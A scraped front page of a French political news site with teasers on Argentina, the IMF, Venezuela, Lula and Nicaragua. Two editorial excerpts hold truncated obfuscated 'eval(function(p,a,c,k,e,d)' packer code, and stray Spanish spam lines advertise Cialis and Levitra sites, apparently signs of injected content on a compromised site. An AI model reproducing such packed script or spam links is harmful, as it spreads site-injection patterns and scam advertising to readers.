REDHER - La pluma
Accueil Articles Politique


Amérique latine

Ton changement n'est pas le mien. Lettre ouverte au gouvernement argentin

Ton changement n'est pas le mien. Lettre ouverte au gouvernement argentin

Le  programme que vous essayez de mettre en œuvre consiste en un changement dans les relations économiques et sociales. Avec un tel changement, le pays perdrait toute indépendance et serait à nouveau incapable de prendre des décisions souveraines. Il redeviendrait une table de jeu pour les spéculateurs internationaux, une nation désindustrialisée, réduite au rôle de producteur de matières premières et livrée au pillage et à la dilapidation de ses biens et de ses infrastructures. Ce serait un retour à l’Argentine aristocratique à laquelle, dans notre histoire, une série de gouvernements populaires ont tenté de mettre fin. 

 

Je suis un.e migrant.e

Je suis un.e migrant.e

Don Juan

« Il faut comprendre la terminologie du migrant », dit Don Juan Sierra, responsable bénévole de la Casa del Migrante (Maison du migrant) à Matamoros, qui explique comment il l'a vu depuis plus de 5 ans qu'il a commencé à se porter volontaire pour aider les migrants : « Quand une personne est expulsée USA elle est appelée déportée, quand elle arrive à la frontière mexicaine, elle est appelée rapatriée et à partir du moment où la personne rapatriée obtient un document avec sa nationalité, elle devient un migrant parce qu'elle commence une marche vers son lieu d'origine venant d'un autre endroit.

Crise monétaire au Venezuela

Crise monétaire au Venezuela

Quand les milieux financiers accablent un pays tout entier, surtout dans le Sud, il faut des politiciens courageux pour faire des choix en faveur des couches populaires. C'est ce que fait Maduro au Venezuela. Augmentation du salaire minimum, rationalisation de l'essence, rajustement de la monnaie, ...

L’Argentine ouvre de nouveau la porte au FMI qui plongea le pays dans la crise

L’Argentine ouvre de nouveau la porte au FMI qui plongea le pays dans la crise

De nouveau, l’Argentine s’adresse au FMI et se soumet à ses conditions. Cela signifie, une fois de plus, l’approfondissement des politiques néolibérales du gouvernement au détriment de la population.

Malgré l’histoire tumultueuse du Fonds monétaire international dans ce pays d’Amérique du Sud, l’Argentine a de nouveau appuyé sur le « bouton FMI ». Il y a dix-sept ans, le FMI avait entraîné l’Argentine dans la plus grande crise de son histoire récente, provoquant la chute de quatre présidents en une semaine.

Conflit entre États latinoaméricains et entreprises transnationales

Conflit entre États latinoaméricains et entreprises transnationales

Les défis de la région face à des traités d’investissement asymétriques

Les positions politiques et les législations relatives à l’investissement étranger se sont polarisées en deux points de vue opposés. D’une part, l’un suppose que l’investissement direct étranger (IDE) est essentiel pour susciter un bond dans le développement économique des pays de la périphérie, impulsant ainsi leur promotion, voire générant une certaine concurrence entre les pays désireux d’attirer cet investissement par des mesures incitatives. D’autre part, l’autre considère que les pays doivent légiférer sur l’IDE et le réglementer de manière à donner la priorité aux intérêts nationaux et à générer des stratégies et dynamiques propres de développement économique et social durable, et de défense du patrimoine national, sans les subordonner au seul objectif de maximisation des profits ni à la logique des décisions du capital étranger privé, toujours changeante et incertaine.

Lula : c’est la démocratie que je veux, pas l’impunité

Lula : c’est la démocratie que je veux, pas l’impunité

Dans un article écrit depuis sa prison de Curitiba  pour le New York Times, l’ancien président Luiz Inácio Lula da Silva affirme qu’un coup d’ État de droite est en cours au Brésil.

CURITIBA, Brésil ? Il y a seize ans, le Brésil était en crise : l’avenir était incertain. Notre rêve de devenir un des pays les plus prospères et démocratiques au monde  semblait menacé. L’idée qu’un jour nos concitoyens pourraient jouir d’un niveau de vie aussi confortable que les Européens et les habitants des autres démocraties occidentales semblait s’estomper. Moins de 20 ans après la fin de la dictature, certaines blessures n’étaient pas encore refermées.

Nicaragua : Poursuite des réflexions sur l’expérience sandiniste des années 1980-1990 afin de comprendre le régime de Daniel Ortega et de Rosario Murillo

Nicaragua : Poursuite des réflexions sur l’expérience sandiniste des années 1980-1990 afin de comprendre le régime de Daniel Ortega et de Rosario Murillo

Troisième partie

En juillet 1979 a triomphé une authentique révolution combinant un soulèvement populaire, l’auto-organisation de villes et de quartiers insurgés ainsi que l’action du FSLN, organisation politico-militaire d’inspiration marxiste-guévariste/castriste.

Brésil: la grande désillusion

Brésil: la grande désillusion

Les Brésiliens iront aux urnes cet automne pour la première fois depuis la destitution de la présidente Dilma Rousseff en 2016.

Violence endémique, économie instable et inégalitaire, prolifération de groupes de trafiquants, les enjeux électoraux ne sauraient être plus déterminants pour l’avenir et la sécurité du pays. Or, bien que, déjà, 16 partis politiques aient déjà annoncé leur candidature ou précandidature, les plus récents sondages démontrent qu’une large portion d’électeurs annulerait leur vote s’il avait lieu aujourd’hui.

Nicaragua: 19 juillet 1979 - 19 juillet 2018

Nicaragua: 19 juillet 1979 - 19 juillet 2018

Naguère, sans désoler nos médias, les Contras massacraient en masse : médecins, instituteurs, jeunes alphabétiseurs, simples citoyens…

Ce petit pays d’Amérique centrale est à feu et à sang. Le président, Daniel Ortega, ex guerillero sandiniste, semble loin des idéaux de la révolution. Mais les Etats-Unis n’ont pas renoncé à leurs velléités de déstabilisation.

Gracias, pero con Cialis soft intentaron sin embargo, lo que los medicamentos como el Viagra comprar-cialis.net

Les dossiers brûlants d'actualité

 

Éditorial La Pluma n ° 1: À tou.tes

Nous eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};...

 

Venezuela: la parole au Pouvoir constituant originel, le peuple !

« Dans eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){retur...
Uno Levitra Professional es de los MEDICAMENTOS mas Comunes comprar levitra en-linea

Compteur des visites

mod_vvisit_countermod_vvisit_countermod_vvisit_countermod_vvisit_countermod_vvisit_countermod_vvisit_countermod_vvisit_countermod_vvisit_countermod_vvisit_counter
mod_vvisit_counterAujourd'hui4040
mod_vvisit_counterHier10634
mod_vvisit_counterCette semaine40790
mod_vvisit_countersemaine précedente64507
mod_vvisit_counterCe-mois-ci171209
mod_vvisit_countermois précedent332053

We have: 255 guests online
Ton IP: 54.158.199.217
 , 
Aujourd'hui: 19 Sep 2018